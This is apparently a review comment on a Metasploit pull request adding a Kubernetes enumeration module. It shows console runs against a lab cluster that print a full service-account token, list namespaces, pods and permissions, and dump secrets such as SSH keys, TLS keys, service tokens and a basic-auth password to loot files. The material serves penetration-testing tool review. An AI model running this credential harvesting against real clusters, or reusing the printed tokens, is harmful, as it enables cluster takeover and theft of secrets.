Add kubernetes enum module #15786
Everything looks good to me. I tested it both with and without a session, the action commands, different outputs etc.
With a session
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > show options
Module options (auxiliary/cloud/kubernetes/enum_kubernetes):
Name Current Setting Required Description
---- --------------- -------- -----------
HIGHLIGHT_NAME_PATTERN username|password|user|pass yes PCRE regex of resource names to highlight
NAME no The name of the resource to enumerate
NAMESPACE default no The Kubernetes namespace
NAMESPACE_LIST default,dev,staging,production,kube-public,kube-node-lease,kube-lease,kube-system no The default namespace list to iterate when the current token does not have the permission to retrieve the available namespaces
OUTPUT table yes output format to use (Accepted: table, json)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS no The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT no The target port (TCP)
SESSION -1 no An optional session to use for configuration
SSL true no Negotiate SSL/TLS for outgoing connections
TOKEN no Kubernetes API token
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
---- -----------
all enumerate all resources
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > run
[*] Routing traffic through session: 2
[+] API Token: eyJhbGciOiJSUzI1NiIsImtpZCI6IjhNUXp3a1NGVk1xQmV0ZGVTbzNxTTJhQ2Y4UHE4TVZlVjVQcVlkMlRPcTgifQ.[...].WiJFrdwJdJJtouTzI_bgAbLbvn6dF4L6tYuoYqinHwXcxc6udWdu-fnllnOutUZU2COxe__JZQcGp_90M9brUwz1W9fy7gnEtPgygYOE598U0P_FQQlkc85QKtVOA7sgnzOM8H9ILFGyB5sgOcDvv71gBRRMcfE1DRNCSvpKfjTKC2noi7yBYF6b38sYzyVt6BDICANbDKQ57ly8RZ78SHG9VNWYS7DcMRzTJgjH3p3-8uXmMFfF0tAUYzRGvsKHyb0QWJ1fKpv9MQ_HXpJABNoshj09GLWTCT3sBARZ4R_HqQ7Qzt_8Wmn9wU9AsuhNkUQ4fmCBFNqRvkn02OW8tw
[+] Kubernetes service host: 10.96.0.1:443
Token Claims
============
name value
---- -----
aud ["https://kubernetes.default.svc.cluster.local"]
exp 1666356640
iat 1634820640
iss https://kubernetes.default.svc.cluster.local
kubernetes.io.namespace default
kubernetes.io.pod.name thinkphp-845db489cc-nx7b9
kubernetes.io.pod.uid b0fafed7-cadb-48b4-b0a5-d4dea6aa2d23
kubernetes.io.serviceaccount.name thinkphp
kubernetes.io.serviceaccount.uid eb92d8cd-b45f-4450-87a1-e800c5789305
kubernetes.io.warnafter 1634824247
nbf 1634820640
sub system:serviceaccount:default:thinkphp
Server API Version
==================
name value
---- -----
buildDate 2021-08-19T15:39:34Z
compiler gc
gitCommit 632ed300f2c34f6d6d15ca4cef3d3c7073412212
gitTreeState clean
gitVersion v1.22.1
goVersion go1.16.7
major 1
minor 22
platform linux/amd64
[+] Enumerating namespaces
Namespaces
==========
# name
- ----
0 default
1 kube-node-lease
2 kube-public
3 kube-system
[+] Namespace 0: default
Auth (namespace: default)
=========================
Resources Non-Resource URLs Resource Names Verbs
--------- ----------------- -------------- -----
* [] [] [*]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
Pods (namespace: default)
=========================
# namespace name status containers ip
- --------- ---- ------ ---------- --
0 default aq9lbyfcgnqd Running nhkkmqsn8 (image: busybox) 172.17.0.4
1 default bekg Running heor3bf41aur (image: busybox) 172.17.0.20
2 default g297o9u3u Running xnh (image: kubernetesui/dashboard:v2.4.0) 172.17.0.11
3 default kkr2 Running qk6tl (image: kubernetesui/dashboard:v2.4.0) 172.17.0.17
4 default kubernetes-dashboard-6dbb4d957f-6tbdj Running kubernetes-dashboard (image: kubernetesui/dashboard:v2.4.0 TCP:8443) 172.17.0.15
5 default lucee-8c958d657-7hnf6 Running lucee (image: lucee/lucee:5.3.7.43 TCP:8888) 172.17.0.13
6 default meh Running ewpvec (image: kubernetesui/dashboard:v2.4.0) 172.17.0.7
7 default mh6 Running vmhss23ijz (image: busybox) 172.17.0.10
8 default oak2zku8qcb Running uwca5kkbwrv (image: kubernetesui/dashboard:v2.4.0) 172.17.0.12
9 default pkm082n3jgj Running p2dg6q (image: busybox) 172.17.0.9
10 default po5cltsu80h Running tj12 (image: busybox) 172.17.0.23
11 default port4gnlgeza Running r52g13 (image: busybox) 172.17.0.21
12 default rqb Running taqtdh (image: kubernetesui/dashboard:v2.4.0) 172.17.0.18
13 default syt Running otflepdi (image: kubernetesui/dashboard:v2.4.0) 172.17.0.5
14 default thinkphp-845db489cc-nx7b9 Running thinkphp (image: vulhub/thinkphp:5.0.23 TCP:80) 172.17.0.16
15 default tn2dn1iqs Running tag2ujl1h (image: kubernetesui/dashboard:v2.4.0) 172.17.0.2
16 default u1uubk1hx6 Running ykyijfc (image: kubernetesui/dashboard:v2.4.0) 172.17.0.3
17 default ui5wzz41j Running xad (image: busybox) 172.17.0.8
18 default ultumax92s Running x7drtuaz5apw (image: busybox) 172.17.0.19
19 default xfmln6v5ewg Running ffb (image: busybox) 172.17.0.22
20 default ydop9 Running p3ahr5o51 (image: kubernetesui/dashboard:v2.4.0) 172.17.0.6
Secrets (namespace: default)
============================
# namespace name type data age
- --------- ---- ---- ---- ---
0 default admin-sa-token-7s98l kubernetes.io/service-account-token ca.crt,namespace,token 21h
1 default default-token-db22s kubernetes.io/service-account-token ca.crt,namespace,token 21h
2 default kubernetes-dashboard-certs Opaque 21h
3 default kubernetes-dashboard-csrf Opaque csrf 21h
4 default kubernetes-dashboard-key-holder Opaque priv,pub 21h
5 default kubernetes-dashboard-token-h2p5h kubernetes.io/service-account-token ca.crt,namespace,token 21h
6 default lucee-token-stpnz kubernetes.io/service-account-token ca.crt,namespace,token 21h
7 default secrets-basic-auth kubernetes.io/basic-auth password,username 21h
8 default secrets-dockerconfigjson kubernetes.io/dockerconfigjson .dockerconfigjson 21h
9 default secrets-empty Opaque 21h
10 default secrets-id-ed25519-with-passphrase kubernetes.io/ssh-auth ssh-privatekey 21h
11 default secrets-id-ed25519-without-passphrase kubernetes.io/ssh-auth ssh-privatekey 21h
12 default secrets-id-rsa-with-passphrase kubernetes.io/ssh-auth ssh-privatekey 21h
13 default secrets-id-rsa-without-passphrase kubernetes.io/ssh-auth ssh-privatekey 21h
14 default secrets-tls kubernetes.io/tls tls.crt,tls.key 21h
15 default secrets-user-password Opaque password,username 21h
16 default sh.helm.release.v1.kubernetes-dashboard.v1 helm.sh/release.v1 release 21h
17 default sh.helm.release.v1.kubernetes-dashboard.v2 helm.sh/release.v1 release 21h
18 default sh.helm.release.v1.kubernetes-dashboard.v3 helm.sh/release.v1 release 19h
19 default sh.helm.release.v1.lucee.v1 helm.sh/release.v1 release 21h
20 default sh.helm.release.v1.secrets.v1 helm.sh/release.v1 release 21h
21 default sh.helm.release.v1.thinkphp.v1 helm.sh/release.v1 release 21h
22 default thinkphp-token-cml9b kubernetes.io/service-account-token ca.crt,namespace,token 21h
[+] service token admin-sa-token-7s98l: /home/smcintyre/.msf4/loot/20211021090713_default_0.0.0.0_kubernetes.token_814041.json
[+] service token default-token-db22s: /home/smcintyre/.msf4/loot/20211021090713_default_0.0.0.0_kubernetes.token_466982.json
[+] service token kubernetes-dashboard-token-h2p5h: /home/smcintyre/.msf4/loot/20211021090713_default_0.0.0.0_kubernetes.token_634542.json
[+] service token lucee-token-stpnz: /home/smcintyre/.msf4/loot/20211021090713_default_0.0.0.0_kubernetes.token_825176.json
[+] basic_auth secrets-basic-auth: root:password123
[-] Failed parsing secret secrets-basic-auth: key not found: :address
[+] dockerconfig json secrets-dockerconfigjson: /home/smcintyre/.msf4/loot/20211021090713_default_unknown_docker.json_709903.json
[+] ssh_key secrets-id-ed25519-with-passphrase: /home/smcintyre/.msf4/loot/20211021090713_default_unknown_id_rsa_116408.txt
[+] ssh_key secrets-id-ed25519-without-passphrase: /home/smcintyre/.msf4/loot/20211021090713_default_unknown_id_rsa_511551.txt
[+] ssh_key secrets-id-rsa-with-passphrase: /home/smcintyre/.msf4/loot/20211021090713_default_unknown_id_rsa_841986.txt
[+] ssh_key secrets-id-rsa-without-passphrase: /home/smcintyre/.msf4/loot/20211021090714_default_unknown_id_rsa_986674.txt
[+] tls_key secrets-tls: /home/smcintyre/.msf4/loot/20211021090714_default_unknown_tls.key_530539.txt
[+] tls_cert secrets-tls: /home/smcintyre/.msf4/loot/20211021090714_default_unknown_tls.cert_395790.crt (/CN=example.com)
[+] service token thinkphp-token-cml9b: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_737577.json
[+] Namespace 1: kube-node-lease
Auth (namespace: kube-node-lease)
=================================
Resources Non-Resource URLs Resource Names Verbs
--------- ----------------- -------------- -----
* [] [] [*]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
Pods (namespace: kube-node-lease)
=================================
# namespace name status containers ip
- --------- ---- ------ ---------- --
No rows
Secrets (namespace: kube-node-lease)
====================================
# namespace name type data age
- --------- ---- ---- ---- ---
0 kube-node-lease default-token-rr9hd kubernetes.io/service-account-token ca.crt,namespace,token 21h
[+] service token default-token-rr9hd: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_057560.json
[+] Namespace 2: kube-public
Auth (namespace: kube-public)
=============================
Resources Non-Resource URLs Resource Names Verbs
--------- ----------------- -------------- -----
* [] [] [*]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
Pods (namespace: kube-public)
=============================
# namespace name status containers ip
- --------- ---- ------ ---------- --
No rows
Secrets (namespace: kube-public)
================================
# namespace name type data age
- --------- ---- ---- ---- ---
0 kube-public default-token-jk68r kubernetes.io/service-account-token ca.crt,namespace,token 21h
[+] service token default-token-jk68r: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_368763.json
[+] Namespace 3: kube-system
Auth (namespace: kube-system)
=============================
Resources Non-Resource URLs Resource Names Verbs
--------- ----------------- -------------- -----
* [] [] [*]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
Pods (namespace: kube-system)
=============================
# namespace name status containers ip
- --------- ---- ------ ---------- --
0 kube-system coredns-78fcd69978-9ktdz Running coredns (image: k8s.gcr.io/coredns/coredns:v1.8.4 UDP:53,TCP:53,TCP:9153) 172.17.0.14
1 kube-system etcd-minikube Running etcd (image: k8s.gcr.io/etcd:3.5.0-0) 192.168.49.2
2 kube-system kube-apiserver-minikube Running kube-apiserver (image: k8s.gcr.io/kube-apiserver:v1.22.1) 192.168.49.2
3 kube-system kube-controller-manager-minikube Running kube-controller-manager (image: k8s.gcr.io/kube-controller-manager:v1.22.1) 192.168.49.2
4 kube-system kube-proxy-dzpmf Running kube-proxy (image: k8s.gcr.io/kube-proxy:v1.22.1) 192.168.49.2
5 kube-system kube-scheduler-minikube Running kube-scheduler (image: k8s.gcr.io/kube-scheduler:v1.22.1) 192.168.49.2
6 kube-system storage-provisioner Running storage-provisioner (image: gcr.io/k8s-minikube/storage-provisioner:v5) 192.168.49.2
Secrets (namespace: kube-system)
================================
# namespace name type data age
- --------- ---- ---- ---- ---
0 kube-system attachdetach-controller-token-8dxjl kubernetes.io/service-account-token ca.crt,namespace,token 21h
1 kube-system bootstrap-signer-token-wfvtd kubernetes.io/service-account-token ca.crt,namespace,token 21h
2 kube-system bootstrap-token-bfr928 bootstrap.kubernetes.io/token auth-extra-groups,expiration,token-id,token-secret,usage-bootstrap-authentication,usage-bootstrap-signing 21h
3 kube-system certificate-controller-token-h6jbb kubernetes.io/service-account-token ca.crt,namespace,token 21h
4 kube-system clusterrole-aggregation-controller-token-jqvwq kubernetes.io/service-account-token ca.crt,namespace,token 21h
5 kube-system coredns-token-g7vl2 kubernetes.io/service-account-token ca.crt,namespace,token 21h
6 kube-system cronjob-controller-token-z47mc kubernetes.io/service-account-token ca.crt,namespace,token 21h
7 kube-system daemon-set-controller-token-687t9 kubernetes.io/service-account-token ca.crt,namespace,token 21h
8 kube-system default-token-vkz9f kubernetes.io/service-account-token ca.crt,namespace,token 21h
9 kube-system deployment-controller-token-pkx8p kubernetes.io/service-account-token ca.crt,namespace,token 21h
10 kube-system disruption-controller-token-89g95 kubernetes.io/service-account-token ca.crt,namespace,token 21h
11 kube-system endpoint-controller-token-r524w kubernetes.io/service-account-token ca.crt,namespace,token 21h
12 kube-system endpointslice-controller-token-vmm8h kubernetes.io/service-account-token ca.crt,namespace,token 21h
13 kube-system endpointslicemirroring-controller-token-t79hc kubernetes.io/service-account-token ca.crt,namespace,token 21h
14 kube-system ephemeral-volume-controller-token-gknzr kubernetes.io/service-account-token ca.crt,namespace,token 21h
15 kube-system expand-controller-token-b8mp4 kubernetes.io/service-account-token ca.crt,namespace,token 21h
16 kube-system generic-garbage-collector-token-5w2j5 kubernetes.io/service-account-token ca.crt,namespace,token 21h
17 kube-system horizontal-pod-autoscaler-token-sjrxn kubernetes.io/service-account-token ca.crt,namespace,token 21h
18 kube-system job-controller-token-wn84n kubernetes.io/service-account-token ca.crt,namespace,token 21h
19 kube-system kube-proxy-token-7x5lg kubernetes.io/service-account-token ca.crt,namespace,token 21h
20 kube-system namespace-controller-token-9bb4x kubernetes.io/service-account-token ca.crt,namespace,token 21h
21 kube-system node-controller-token-l44n2 kubernetes.io/service-account-token ca.crt,namespace,token 21h
22 kube-system persistent-volume-binder-token-nhpj2 kubernetes.io/service-account-token ca.crt,namespace,token 21h
23 kube-system pod-garbage-collector-token-sfk5t kubernetes.io/service-account-token ca.crt,namespace,token 21h
24 kube-system pv-protection-controller-token-4mbl5 kubernetes.io/service-account-token ca.crt,namespace,token 21h
25 kube-system pvc-protection-controller-token-htj54 kubernetes.io/service-account-token ca.crt,namespace,token 21h
26 kube-system replicaset-controller-token-fhd7g kubernetes.io/service-account-token ca.crt,namespace,token 21h
27 kube-system replication-controller-token-rw9sx kubernetes.io/service-account-token ca.crt,namespace,token 21h
28 kube-system resourcequota-controller-token-6p6n5 kubernetes.io/service-account-token ca.crt,namespace,token 21h
29 kube-system root-ca-cert-publisher-token-ghc5g kubernetes.io/service-account-token ca.crt,namespace,token 21h
30 kube-system service-account-controller-token-s8kp5 kubernetes.io/service-account-token ca.crt,namespace,token 21h
31 kube-system service-controller-token-lngkb kubernetes.io/service-account-token ca.crt,namespace,token 21h
32 kube-system statefulset-controller-token-bwlgx kubernetes.io/service-account-token ca.crt,namespace,token 21h
33 kube-system storage-provisioner-token-2gj94 kubernetes.io/service-account-token ca.crt,namespace,token 21h
34 kube-system token-cleaner-token-fwbmc kubernetes.io/service-account-token ca.crt,namespace,token 21h
35 kube-system ttl-after-finished-controller-token-jrfjc kubernetes.io/service-account-token ca.crt,namespace,token 21h
36 kube-system ttl-controller-token-nv9px kubernetes.io/service-account-token ca.crt,namespace,token 21h
[+] service token attachdetach-controller-token-8dxjl: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_887172.json
[+] service token bootstrap-signer-token-wfvtd: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_339866.json
[+] service token certificate-controller-token-h6jbb: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_316093.json
[+] service token clusterrole-aggregation-controller-token-jqvwq: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_426673.json
[+] service token coredns-token-g7vl2: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_286146.json
[+] service token cronjob-controller-token-z47mc: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_294634.json
[+] service token daemon-set-controller-token-687t9: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_564661.json
[+] service token default-token-vkz9f: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_625308.json
[+] service token deployment-controller-token-pkx8p: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_706873.json
[+] service token disruption-controller-token-89g95: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_619323.json
[+] service token endpoint-controller-token-r524w: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_305779.json
[+] service token endpointslice-controller-token-vmm8h: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_718735.json
[+] service token endpointslicemirroring-controller-token-t79hc: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_810878.json
[+] service token ephemeral-volume-controller-token-gknzr: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_559646.json
[+] service token expand-controller-token-b8mp4: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_393300.json
[+] service token generic-garbage-collector-token-5w2j5: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_373751.json
[+] service token horizontal-pod-autoscaler-token-sjrxn: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_721652.json
[+] service token job-controller-token-wn84n: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_205132.json
[+] service token kube-proxy-token-7x5lg: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_524390.json
[+] service token namespace-controller-token-9bb4x: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_886498.json
[+] service token node-controller-token-l44n2: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_771745.json
[+] service token persistent-volume-binder-token-nhpj2: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_304163.json
[+] service token pod-garbage-collector-token-sfk5t: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_714133.json
[+] service token pv-protection-controller-token-4mbl5: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_376293.json
[+] service token pvc-protection-controller-token-htj54: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_547055.json
[+] service token replicaset-controller-token-fhd7g: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_069845.json
[+] service token replication-controller-token-rw9sx: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_082870.json
[+] service token resourcequota-controller-token-6p6n5: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_664006.json
[+] service token root-ca-cert-publisher-token-ghc5g: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_898265.json
[+] service token service-account-controller-token-s8kp5: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_922978.json
[+] service token service-controller-token-lngkb: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_965027.json
[+] service token statefulset-controller-token-bwlgx: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_989428.json
[+] service token storage-provisioner-token-2gj94: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_832281.json
[+] service token token-cleaner-token-fwbmc: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_561991.json
[+] service token ttl-after-finished-controller-token-jrfjc: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_112416.json
[+] service token ttl-controller-token-nv9px: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_719132.json
[*] Auxiliary module execution completed
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) >
Without a session
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > set TOKEN eyJhbGciOiJSUzI1NiIsImtpZCI6IjhNUXp3a1NGVk1xQmV0ZGVTbzNxTTJhQ2Y4UHE4TVZlVjVQcVlkMlRPcTgifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkZWZhdWx0Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImFkbWluLXNhLXRva2VuLTdzOThsIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQubmFtZSI6ImFkbWluLXNhIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQudWlkIjoiMmNjMDM1MzktNjhhYS00Mjg2LWE4ZmMtYjdmMDI5NzMzOGM5Iiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6YWRtaW4tc2EifQ.rY4MMougu_xPsKsACXcbkJC7ueLzH3YMHlviEpR9o0rKHHAxjDLTK7sC9j1brBkV7oc2kFwbmrlvQ5LEleyeughXq_GfPm47CnUg2Orhv80a7gmJU_WP_mkLhD1xcb4d-7uzEk08V5lswxCTof7qQK7UQBaGI4k6d_6B15jkCBd8fFdl1XqMAN1rokM5YmIwq_i_Eu-hquZIEduqyW2p9V-JVMYC82mLFdffcsjvZeXfOLgr8yiFEvTUZUEnhqZFaLRiT4ioMWQ939fQvLoFVAcloSwk09GM_xS4_8oMCfJd4D5sSCtshN_cEMX_Ht-M2JwjK_tVLTCnbheOwTZPxw
TOKEN => eyJhbGciOiJSUzI1NiIsImtpZCI6IjhNUXp3a1NGVk1xQmV0ZGVTbzNxTTJhQ2Y4UHE4TVZlVjVQcVlkMlRPcTgifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkZWZhdWx0Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImFkbWluLXNhLXRva2VuLTdzOThsIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQubmFtZSI6ImFkbWluLXNhIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQudWlkIjoiMmNjMDM1MzktNjhhYS00Mjg2LWE4ZmMtYjdmMDI5NzMzOGM5Iiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6YWRtaW4tc2EifQ.rY4MMougu_xPsKsACXcbkJC7ueLzH3YMHlviEpR9o0rKHHAxjDLTK7sC9j1brBkV7oc2kFwbmrlvQ5LEleyeughXq_GfPm47CnUg2Orhv80a7gmJU_WP_mkLhD1xcb4d-7uzEk08V5lswxCTof7qQK7UQBaGI4k6d_6B15jkCBd8fFdl1XqMAN1rokM5YmIwq_i_Eu-hquZIEduqyW2p9V-JVMYC82mLFdffcsjvZeXfOLgr8yiFEvTUZUEnhqZFaLRiT4ioMWQ939fQvLoFVAcloSwk09GM_xS4_8oMCfJd4D5sSCtshN_cEMX_Ht-M2JwjK_tVLTCnbheOwTZPxw
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > run https://192.168.159.31:8443 SESSION=""
[*] Running module against 192.168.159.31
Token Claims
============
name value
---- -----
iss kubernetes/serviceaccount
kubernetes.io/serviceaccount/namespace default
kubernetes.io/serviceaccount/secret.name admin-sa-token-7s98l
kubernetes.io/serviceaccount/service-account.name admin-sa
kubernetes.io/serviceaccount/service-account.uid 2cc03539-68aa-4286-a8fc-b7f0297338c9
sub system:serviceaccount:default:admin-sa
Server API Version
==================
name value
---- -----
buildDate 2021-08-19T15:39:34Z
compiler gc
gitCommit 632ed300f2c34f6d6d15ca4cef3d3c7073412212
gitTreeState clean
gitVersion v1.22.1
goVersion go1.16.7
major 1
minor 22
platform linux/amd64
[+] Enumerating namespaces
Namespaces
==========
# name
- ----
0 default
1 kube-node-lease
2 kube-public
3 kube-system
[+] Namespace 0: default
Auth (namespace: default)
=========================
Resources Non-Resource URLs Resource Names Verbs
--------- ----------------- -------------- -----
*.* [] [] [*]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[*] [] [*]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
Pods (namespace: default)
=========================
# namespace name status containers ip
- --------- ---- ------ ---------- --
0 default aq9lbyfcgnqd Running nhkkmqsn8 (image: busybox) 172.17.0.4
1 default bekg Running heor3bf41aur (image: busybox) 172.17.0.20
2 default g297o9u3u Running xnh (image: kubernetesui/dashboard:v2.4.0) 172.17.0.11
3 default kkr2 Running qk6tl (image: kubernetesui/dashboard:v2.4.0) 172.17.0.17
4 default kubernetes-dashboard-6dbb4d957f-6tbdj Running kubernetes-dashboard (image: kubernetesui/dashboard:v2.4.0 TCP:8443) 172.17.0.15
5 default lucee-8c958d657-7hnf6 Running lucee (image: lucee/lucee:5.3.7.43 TCP:8888) 172.17.0.13
6 default meh Running ewpvec (image: kubernetesui/dashboard:v2.4.0) 172.17.0.7
7 default mh6 Running vmhss23ijz (image: busybox) 172.17.0.10
8 default oak2zku8qcb Running uwca5kkbwrv (image: kubernetesui/dashboard:v2.4.0) 172.17.0.12
9 default pkm082n3jgj Running p2dg6q (image: busybox) 172.17.0.9
10 default po5cltsu80h Running tj12 (image: busybox) 172.17.0.23
11 default port4gnlgeza Running r52g13 (image: busybox) 172.17.0.21
12 default rqb Running taqtdh (image: kubernetesui/dashboard:v2.4.0) 172.17.0.18
13 default syt Running otflepdi (image: kubernetesui/dashboard:v2.4.0) 172.17.0.5
14 default thinkphp-845db489cc-nx7b9 Running thinkphp (image: vulhub/thinkphp:5.0.23 TCP:80) 172.17.0.16
15 default tn2dn1iqs Running tag2ujl1h (image: kubernetesui/dashboard:v2.4.0) 172.17.0.2
16 default u1uubk1hx6 Running ykyijfc (image: kubernetesui/dashboard:v2.4.0) 172.17.0.3
17 default ui5wzz41j Running xad (image: busybox) 172.17.0.8
18 default ultumax92s Running x7drtuaz5apw (image: busybox) 172.17.0.19
19 default xfmln6v5ewg Running ffb (image: busybox) 172.17.0.22
20 default ydop9 Running p3ahr5o51 (image: kubernetesui/dashboard:v2.4.0) 172.17.0.6
Secrets (namespace: default)
============================
# namespace name type data age
- --------- ---- ---- ---- ---
0 default admin-sa-token-7s98l kubernetes.io/service-account-token ca.crt,namespace,token 21h
1 default default-token-db22s kubernetes.io/service-account-token ca.crt,namespace,token 21h
2 default kubernetes-dashboard-certs Opaque 21h
3 default kubernetes-dashboard-csrf Opaque csrf 21h
4 default kubernetes-dashboard-key-holder Opaque priv,pub 21h
5 default kubernetes-dashboard-token-h2p5h kubernetes.io/service-account-token ca.crt,namespace,token 21h
6 default lucee-token-stpnz kubernetes.io/service-account-token ca.crt,namespace,token 21h
7 default secrets-basic-auth kubernetes.io/basic-auth password,username 21h
8 default secrets-dockerconfigjson kubernetes.io/dockerconfigjson .dockerconfigjson 21h
9 default secrets-empty Opaque 21h
10 default secrets-id-ed25519-with-passphrase kubernetes.io/ssh-auth ssh-privatekey 21h
11 default secrets-id-ed25519-without-passphrase kubernetes.io/ssh-auth ssh-privatekey 21h
12 default secrets-id-rsa-with-passphrase kubernetes.io/ssh-auth ssh-privatekey 21h
